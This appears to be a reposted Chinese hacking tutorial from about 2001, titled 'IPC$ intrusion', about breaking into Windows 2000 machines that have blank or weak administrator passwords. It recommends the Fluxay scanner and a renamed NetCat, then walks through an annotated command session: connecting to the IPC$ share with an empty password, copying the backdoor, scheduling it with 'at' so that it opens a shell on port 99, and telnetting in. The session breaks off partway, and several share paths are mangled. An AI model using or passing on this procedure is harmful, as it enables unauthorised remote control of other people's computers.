IPC$入侵
IPC$入侵
IPC$是Windows的默認共享。其實,這個共享并沒有什么漏洞。
我們可以用主機的管理員用戶名和密碼連接。
問題就出在管理員密碼了。直至現(xiàn)在為止,世界上起碼有20%的人,把主機密碼設(shè)置為“空”或者“123”等簡單密碼。
我們要尋找這些主機十分簡單。只需要一個程序就可以。
下面,我會把以前寫的一篇IPC$入侵文章,進行小小的修改。
本次范例需要的系統(tǒng)及程序情況如下:
操作系統(tǒng):Windows 2000
對方操作系統(tǒng):Windows 2000
程序(一):流光 IV 國際版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP)
程序(二):Srv.exe
程序(三):Ntlm.exe
本機IP:127.0.0.1
測試IP:127.0.0.25
新程序介紹:
Srv.exe:實際上是NetCat,這里改名為Srv.exe。用于在主機建立一個端口為99的shell。
Ntlm.exe:是小榕寫的一個程序,用于修改Windows 2000 Telnet Servery身份驗證的方式。
關(guān)于掃描的方法,在流光的help目錄有一個ipc.mht的文件。里面有使用說明。
假設(shè),我們掃描了一臺IPC$主機:127.0.0.25
用戶名:davis
密碼:空
“//”后是注解。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權(quán)所有 1985-1998 Microsoft Corp.
D:>net use \127.0.0.25$ "" /user:"davis" //這是我用流光掃到的密碼~~~我們就拿它開刀吧~!
命令成功完成。
D:>copy srv.exe \127.0.0.25$ //先復制srv.exe上去,在流光的Tools目錄就有。
已復制 1 個文件。
D:>net time \127.0.0.25 //查查時間。
\127.0.0.25 的當前時間是 2001/1/17 上午 10:48
命令成功完成。
D:>at \\127.0.0.25 10:50 srv.exe //用at命令啟動srv.exe吧~?。ㄟ@里設(shè)置的時間要比主機時間快)先去論壇灌幾篇帖子。
新加了一項作業(yè),其作業(yè) ID = 1
D:>net time \\127.0.0.25 //再查查夠時間沒有?!噢~~夠了~
127.0.0.25 的當前時間是 2001/1/17 上午 10:51
命令成功完成。
D:>telnet 127.0.0.25 99 //我們telnet吧,注意端口是99哦~
Microsoft Windows 2000 [
本站僅提供存儲服務,所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請
點擊舉報。